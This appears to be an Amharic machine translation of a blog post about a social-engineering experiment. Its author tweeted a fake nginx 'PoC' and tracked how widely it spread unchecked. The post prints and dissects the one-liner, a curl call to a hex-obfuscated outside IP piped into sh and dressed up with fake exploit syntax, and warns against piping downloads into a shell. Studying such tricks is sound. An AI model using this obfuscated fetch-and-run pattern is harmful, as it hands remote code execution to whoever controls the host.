ለ nginx የውሸት ብዝበዛ ያለው የማህበራዊ ሙከራ ስኬት

ማስታወሻ. ትርጉም: ደራሲ ኦሪጅናል ማስታወሻ፣ በጁን 1 የታተመ፣ ለመረጃ ደህንነት ፍላጎት ባላቸው መካከል ሙከራ ለማድረግ ወሰነ። ይህንን ለማድረግ በድር ሰርቨር ውስጥ ላልታወቀ ተጋላጭነት የውሸት ብዝበዛ አዘጋጅቶ በትዊተር ገፁ ላይ አስፍሯል። የእሱ ግምቶች - በኮዱ ውስጥ ግልጽ የሆነ ማታለልን በሚመለከቱ ስፔሻሊስቶች በቅጽበት መጋለጥ - ብቻ ሳይሆን እውነት አልመጣም ... ከሚጠበቀው በላይ አልፈዋል, እና በተቃራኒው አቅጣጫ: ትዊቱ ከሌላቸው ብዙ ሰዎች ከፍተኛ ድጋፍ አግኝቷል. ይዘቱን ይፈትሹ.

ለ nginx የውሸት ብዝበዛ ያለው የማህበራዊ ሙከራ ስኬት

TL;DR: በማንኛውም ሁኔታ የፋይል ቧንቧዎችን በ sh ወይም bash አይጠቀሙ። ይህ የኮምፒተርዎን ቁጥጥር ለማጣት ጥሩ መንገድ ነው።

በሜይ 31 ስለተፈጠረው የኮሚክ PoC ብዝበዛ አጭር ታሪክ ላካፍላችሁ እፈልጋለሁ። ከ ዜና ምላሽ ወዲያውኑ ታየ Alisa Esage Shevchenko፣ አባል ዜሮ ቀን ኢኒativeቲቭ (ZDI)፣ ያ በNGINX ውስጥ ወደ RCE (የርቀት ኮድ አፈጻጸም) ስለሚያመራው ተጋላጭነት መረጃ በቅርቡ ይፋ ይሆናል። NGINX ብዙ ድረ-ገጾችን ስለሚያንቀሳቅስ፣ ዜናው ቦምብ መሆን አለበት። ነገር ግን "በኃላፊነት የመግለፅ" ሂደት መዘግየቶች ምክንያት የተከሰቱት ዝርዝሮች አልታወቁም - ይህ መደበኛ የ ZDI ሂደት ነው.

ለ nginx የውሸት ብዝበዛ ያለው የማህበራዊ ሙከራ ስኬት
ትዊተር በNGINX ውስጥ ስለ ተጋላጭነት መግለጫ

አዲስ የድብደባ ቴክኒኮችን በኩርባ ሰርቼ እንደጨረስኩ የመጀመሪያውን ትዊት ጠቅሼ "የሚሰራ ፖሲ ፈስሷል" የተገኘውን ተጋላጭነት ይጠቀማል ተብሎ የሚገመተውን ነጠላ መስመር የያዘ ኮድ። በእርግጥ ይህ ሙሉ በሙሉ ከንቱ ነበር። ወዲያው እንደምገለጥ ገምቼ ነበር፣ እና በጥሩ ሁኔታ ሁለት ድጋሚ ትዊቶችን አገኛለሁ (ኦህ ጥሩ)።

ለ nginx የውሸት ብዝበዛ ያለው የማህበራዊ ሙከራ ስኬት
ትዊተር ከውሸት ብዝበዛ ጋር

ሆኖም ቀጥሎ ምን እንደተፈጠረ መገመት አልቻልኩም። የትዊቴ ተወዳጅነት ከፍ ብሏል። የሚገርመው, በአሁኑ ጊዜ (15:00 ሞስኮ ሰዓት ሰኔ 1) ጥቂት ሰዎች ይህ የውሸት መሆኑን ተገንዝበዋል. ብዙ ሰዎች ምንም ሳያረጋግጡ እንደገና ትዊት ያደርጋሉ (የሚያወጣውን ተወዳጅ ASCII ግራፊክስ ማድነቅ ይቅርና)።

ለ nginx የውሸት ብዝበዛ ያለው የማህበራዊ ሙከራ ስኬት
ምን ያህል ቆንጆ እንደሆነ ብቻ ተመልከት!

እነዚህ ሁሉ ቀለበቶች እና ቀለሞች በጣም ጥሩ ቢሆኑም ሰዎች እነሱን ለማየት በማሽኑ ላይ ኮድ ማስኬድ እንደነበረባቸው ግልጽ ነው። እንደ እድል ሆኖ, አሳሾች በተመሳሳይ መንገድ ይሰራሉ, እና በእውነቱ ህጋዊ ችግር ውስጥ መግባት ከማልፈልግ እውነታ ጋር ተዳምሮ, በጣቢያዬ ውስጥ የተቀበረው ኮድ ምንም ተጨማሪ ኮድ ለመጫን ወይም ለማስፈጸም ሳልሞክር የማሚ ጥሪዎችን ማድረግ ብቻ ነበር.

ትንሽ መረበሽ; netspooky, ዲኤንዝእኔ እና ሌሎች የቡድኑ አባላት ወሮበላ የዘራፊ ቡድን ስብስብ አሁን ለተወሰነ ጊዜ የከርል ትእዛዞችን ለመደበቅ በተለያዩ መንገዶች እየተጫወትን ነበር ምክንያቱም አሪፍ ነው... እና እኛ ጂኮች ነን። netspooky እና dnz ለእኔ እጅግ በጣም ተስፋ ሰጪ የሚመስሉ ብዙ አዳዲስ ዘዴዎችን አግኝተዋል። በጨዋታው ውስጥ ተቀላቀልኩ እና የአይፒ አስርዮሽ ልወጣዎችን ወደ ብልሃቶች ቦርሳ ለመጨመር ሞከርኩ። አይፒ ወደ ሄክሳዴሲማል ቅርጸት ሊቀየርም እንደሚችል ተገለጸ። በተጨማሪም ፣ ከርል እና ሌሎች አብዛኛዎቹ NIX መሳሪያዎች ሄክሳዴሲማል አይፒዎችን በደስታ ይበላሉ! ስለዚህ አሳማኝ እና ደህንነቱ የተጠበቀ የትእዛዝ መስመር መፍጠር ብቻ ነበር። በመጨረሻ በዚህ ጉዳይ ላይ ወሰንኩ፡-

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

ሶሺዮ-ኤሌክትሮኒካዊ ምህንድስና (SEE) - ከማስገር በላይ

ደህንነት እና መተዋወቅ የዚህ ሙከራ ዋና አካል ነበሩ። ለስኬቱ ያበቁት እነሱ ናቸው ብዬ አስባለሁ። የትእዛዝ መስመሩ "127.0.0.1" (ታዋቂውን የአካባቢ አስተናጋጅ) በመጥቀስ ደህንነትን በግልፅ አሳይቷል። Localhost ደህንነቱ የተጠበቀ እንደሆነ ይቆጠራል እና በእሱ ላይ ያለው ውሂብ በጭራሽ ኮምፒተርዎን አይተዉም.

መተዋወቅ የሙከራው ሁለተኛው የ SEE አካል ነበር። የታለመላቸው ታዳሚዎች በዋናነት የኮምፒዩተር ደህንነትን መሰረታዊ ነገሮች የሚያውቁ ሰዎችን ያቀፈ በመሆኑ፣ ክፍሎቹ የተለመዱ እና የተለመዱ (ስለዚህም አስተማማኝ) እንዲመስሉ ኮድ መፍጠር አስፈላጊ ነበር። የድሮ ብዝበዛ ጽንሰ-ሀሳቦችን መበደር እና እነሱን ባልተለመደ መንገድ ማዋሃድ በጣም ስኬታማ ሆኖ ተገኝቷል።

ከታች ያለው የአንድ መስመር ዝርዝር ትንታኔ ነው. በዚህ ዝርዝር ውስጥ ያሉት ሁሉም ነገሮች ይለብሳሉ የመዋቢያ ተፈጥሮ, እና በተግባር ለትክክለኛው አሠራሩ ምንም ነገር አያስፈልግም.

ምን ክፍሎች በእርግጥ አስፈላጊ ናቸው? ይህ -gsS, -O 0x0238f06a, |sh እና የድር አገልጋይ ራሱ። የድር አገልጋዩ ምንም አይነት ተንኮል አዘል መመሪያዎችን አልያዘም፣ ነገር ግን በቀላሉ ትዕዛዞችን በመጠቀም ASCII ግራፊክስን አገልግሏል። echo ውስጥ ባለው ስክሪፕት ውስጥ index.html. ተጠቃሚው መስመር ሲገባ |sh መሃል ላይ, index.html ተጭኗል እና ተፈጽሟል. እንደ እድል ሆኖ፣ የድር አገልጋይ ጠባቂዎች ምንም መጥፎ ዓላማ አልነበራቸውም።

  • ../../../%00 - ከማውጫው በላይ መሄድን ይወክላል;
  • ngx_stream_module.so - ወደ የዘፈቀደ የ NGINX ሞጁል መንገድ;
  • /bin/sh%00<'protocol:TCP' - እየጀመርን ነው ተብሎ ይጠበቃል /bin/sh በታለመው ማሽን ላይ እና ውጤቱን ወደ TCP ሰርጥ ማዞር;
  • -O 0x0238f06a#PLToffset - ሚስጥራዊ ንጥረ ነገር ፣ ተጨማሪ #PLToffset, በሆነ መንገድ በ PLT ውስጥ የተካተተ የማስታወሻ ማካካሻ ለመምሰል;
  • |sh; - ሌላ አስፈላጊ ቁራጭ. ከሚገኘው አጥቂ የድር አገልጋይ የሚመጣውን ኮድ ለማስፈጸም ውጤቱን ወደ sh/bash ማዞር ያስፈልገናል 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - netcat የሚያመለክተው ዱሚ /dev/tcp/localhostሁሉም ነገር ደህንነቱ የተጠበቀ እንዲሆን እንደገና። በእውነቱ, ምንም አያደርግም እና በውበት መስመር ውስጥ ተካትቷል.

ይህ የአንድ መስመር ስክሪፕት ዲኮዲንግ እና ስለ "ማህበራዊ-ኤሌክትሮኒካዊ ምህንድስና" (ውስብስብ አስጋሪ) ገጽታዎች ውይይት ያበቃል.

የድር አገልጋይ ውቅር እና የመከላከያ እርምጃዎች

አብዛኛዎቹ የእኔ ተመዝጋቢዎች ኢንፎሴክ/ሰርጎ ገቦች ስለሆኑ፣ ወንዶቹ የሚያደርጉት ነገር እንዲኖራቸው የድረ-ገጽ አገልጋዩ በበኩሉ የ“ፍላጎት” መግለጫዎችን በጥቂቱ እንዲቋቋም ለማድረግ ወሰንኩ። አዘገጃጀት). ሙከራው አሁንም ስለሚቀጥል ሁሉንም ወጥመዶች እዚህ አልዘረዝርም፣ ነገር ግን አገልጋዩ የሚያደርጋቸው ጥቂት ነገሮች እነሆ፡-

  • በተወሰኑ ማህበራዊ አውታረ መረቦች ላይ የማሰራጨት ሙከራዎችን በንቃት ይከታተላል እና ተጠቃሚው አገናኙን ጠቅ እንዲያደርግ ለማበረታታት የተለያዩ ቅድመ እይታ ድንክዬዎችን ይተካል።
  • የሼል ስክሪፕቱን ከማሳየት ይልቅ Chrome/Mozilla/Safari/ወዘተ ወደ Thugcrowd የማስተዋወቂያ ቪዲዮ ያዞራል።
  • ግልጽ የሆኑ የመጥለፍ/የግል ጠለፋ ምልክቶችን ይመለከታል፣ እና ጥያቄዎችን ወደ NSA አገልጋዮች (ሃ!) ማዞር ይጀምራል።
  • ተጠቃሚዎቻቸው አስተናጋጁን ከመደበኛው አሳሽ በሚጎበኙ ሁሉም ኮምፒውተሮች ላይ ትሮጃን እና እንዲሁም ባዮስ ሩትኪት ይጭናል (እየቀለድ ነው!)።

ለ nginx የውሸት ብዝበዛ ያለው የማህበራዊ ሙከራ ስኬት
አንቲሜርሶች ትንሽ ክፍል

በዚህ ሁኔታ ፣ የእኔ ብቸኛ ግቤ አንዳንድ የ Apache ባህሪዎችን ማወቅ ነበር - በተለይም ፣ ጥያቄዎችን ለማዛወር ጥሩ ህጎች - እና እኔ አሰብኩ-ለምን አይሆንም?

NGINX ብዝበዛ (እውነተኛ!)

ይመዝገቡ @alisaesage በትዊተር ላይ እና በNGINX ውስጥ በጣም እውነተኛ ተጋላጭነቶችን እና እድሎችን ለመበዝበዝ የZDIን ታላቅ ስራ ይከተሉ። ስራቸው ሁል ጊዜ ይማርከኝ ነበር እና አሊስ በቲዊትዬ ላይ ባመጣኋቸው ጥቅሶች እና ማሳወቂያዎች ሁሉ ትዕግስት ስላሳየችኝ አመስጋኝ ነኝ። እንደ እድል ሆኖ፣ አንዳንድ ጥሩ ነገሮችንም አድርጓል፡ ስለ NGINX ተጋላጭነቶች እና እንዲሁም በመጠምዘዝ አላግባብ መጠቀም የተከሰቱ ችግሮችን ግንዛቤ ለማሳደግ ረድቷል።

ምንጭ: hab.com

አስተያየት ያክሉ